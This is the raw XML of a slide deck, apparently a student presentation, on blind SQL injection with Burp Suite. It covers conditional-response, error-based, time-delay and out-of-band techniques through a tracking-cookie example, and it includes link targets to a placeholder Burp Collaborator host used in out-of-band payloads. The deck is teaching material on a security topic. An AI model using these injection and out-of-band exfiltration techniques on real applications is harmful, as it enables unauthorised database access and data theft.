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Merriweather Light"/>
      <p:regular r:id="rId59"/>
      <p:bold r:id="rId60"/>
      <p:italic r:id="rId61"/>
      <p:boldItalic r:id="rId62"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat"/>
      <p:regular r:id="rId63"/>
      <p:bold r:id="rId64"/>
      <p:italic r:id="rId65"/>
      <p:boldItalic r:id="rId66"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans SemiBold"/>
      <p:regular r:id="rId67"/>
      <p:bold r:id="rId68"/>
      <p:italic r:id="rId69"/>
      <p:boldItalic r:id="rId70"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Vidaloka"/>
      <p:regular r:id="rId71"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Russo One"/>
      <p:regular r:id="rId72"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Mako"/>
      <p:regular r:id="rId73"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Crimson Text"/>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ako-regular.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RussoOne-regular.fntdata"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/CrimsonText-bold.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/CrimsonText-regular.fntdata"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide29.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/CrimsonText-boldItalic.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/CrimsonText-italic.fntdata"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-bold.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide30.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-regular.fntdata"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Vidaloka-regular.fntdata"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSansSemiBold-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erriweatherLight-boldItalic.fntdata"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/MerriweatherLight-italic.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.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8.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Montserrat-boldItalic.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Montserrat-italic.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSansSemiBold-bold.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSansSemiBold-regular.fntdata"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/MerriweatherLight-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Semi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MerriweatherLight-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5ec48d67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5ec48d67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6323d4da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6323d4da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964c0578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964c0578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6323d4da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96323d4da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cee0caf6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5cee0caf6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cee0caf6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cee0caf6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964c057809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964c057809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cee0caf6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5cee0caf6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964c057809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964c057809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64c057809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64c057809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64c057809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964c057809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cee0caf6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cee0caf6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5ec48d6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95ec48d6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cee0caf6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cee0caf6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5ec48d67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5ec48d67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96210327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96210327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96210327f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96210327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96210327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96210327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96210327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96210327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4002678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94002678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96210327f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96210327f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96210327f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96210327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96210327f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96210327f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cee0caf6a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5cee0caf6a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6323d4da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96323d4da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64c057809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964c057809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5ec48d67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95ec48d67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96323d4dab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6323d4dab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96323d4da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96323d4da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5ec48d67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5ec48d6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96323d4dab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96323d4dab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96323d4da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96323d4da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96323d4da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96323d4da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96323d4da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96323d4da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96323d4da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96323d4da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6323d4da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96323d4da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6323d4dab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96323d4dab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96323d4da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96323d4da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96323d4da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96323d4da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96323d4da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96323d4da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94002678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94002678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96323d4da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96323d4da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96323d4da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96323d4da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3928b80c23270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3928b80c23270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03928b80c23270d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03928b80c23270d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03928b80c23270d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03928b80c23270d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94002678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94002678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95ec48d6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95ec48d6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5ec48d67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95ec48d67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95ec48d6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95ec48d6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hyperlink" Target="http://burp-collaborator-subdomain/%22-" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://burp-collaborator-subdomain/%2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559950" y="690375"/>
            <a:ext cx="8024100" cy="11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BLIND SQL INJECTION(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5700"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="5700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="Google Shape;473;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1037600" y="2076350"/>
            <a:ext cx="7064100" cy="23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TEAM MEMBERS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> HARSH DEV                                                                   2021IMT040</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PAJJURU RAGHAVENDRA REDDY                          2021IMT071</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SHIVAM SINGH                                                              2021IMT091</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SHIVANSH RAI                                                               2021IMT092 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>        YUVRAJ AGRAWAL                                                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2021IMT117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ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="445025"/>
            <a:ext cx="72726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latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Collaborator</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="524" name="Google Shape;524;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="37099" l="0" r="32845" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="935700" y="1282975"/>
            <a:ext cx="7272601" cy="3123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713225" y="445025"/>
            <a:ext cx="62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of  Blind SQL attacks: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="Google Shape;530;p6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1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>By triggering conditional response</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Error-based SQL injection</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-346075" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1850"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>By triggering Time Delay</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Out of band(OAST) technique.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="120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119525" y="431125"/>
            <a:ext cx="8963700" cy="41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                            Blind SQL injection with conditional responses</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="166666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1350">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Consider an application that uses tracking cookies to gather analytics about usage. Requests to the application include a cookie header like this:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="166666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:srgbClr val="188038"/>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solidFill>
                <a:srgbClr val="188038"/>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solidFill>
                <a:srgbClr val="188038"/>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solidFill>
                <a:srgbClr val="188038"/>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50">
              <a:solidFill>
                <a:srgbClr val="188038"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="166666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1350">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>When a request containing a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>TrackingId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1350">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> cookie is processed, the application uses a SQL query to determine whether this is a known user:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="536" name="Google Shape;536;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281125" y="1985977"/>
            <a:ext cx="5895975" cy="153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119525" y="431125"/>
            <a:ext cx="8963700" cy="41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                            Blind SQL injection with conditional responses</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1450">
              <a:solidFill>
                <a:srgbClr val="188038"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="166666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1450">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1450">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="Google Shape;542;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5764775" y="1265050"/>
            <a:ext cx="33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43" name="Google Shape;543;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5134525" y="946500"/>
            <a:ext cx="37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544" name="Google Shape;544;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060225" y="946500"/>
            <a:ext cx="6516601" cy="1587575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="545" name="Google Shape;545;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060225" y="2686425"/>
            <a:ext cx="6516602" cy="165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7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="-673579" l="-2990" r="2989" t="673579"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="748900" y="2785100"/>
            <a:ext cx="3382602" cy="213875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="551" name="Google Shape;551;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473175" y="2026725"/>
            <a:ext cx="7739525" cy="527400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="552" name="Google Shape;552;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="512575" y="1023825"/>
            <a:ext cx="7739525" cy="375925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="553" name="Google Shape;553;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473175" y="3008800"/>
            <a:ext cx="7818325" cy="553852"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="554" name="Google Shape;554;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="512575" y="3970175"/>
            <a:ext cx="7739525" cy="527400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Google Shape;555;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565000" y="1604875"/>
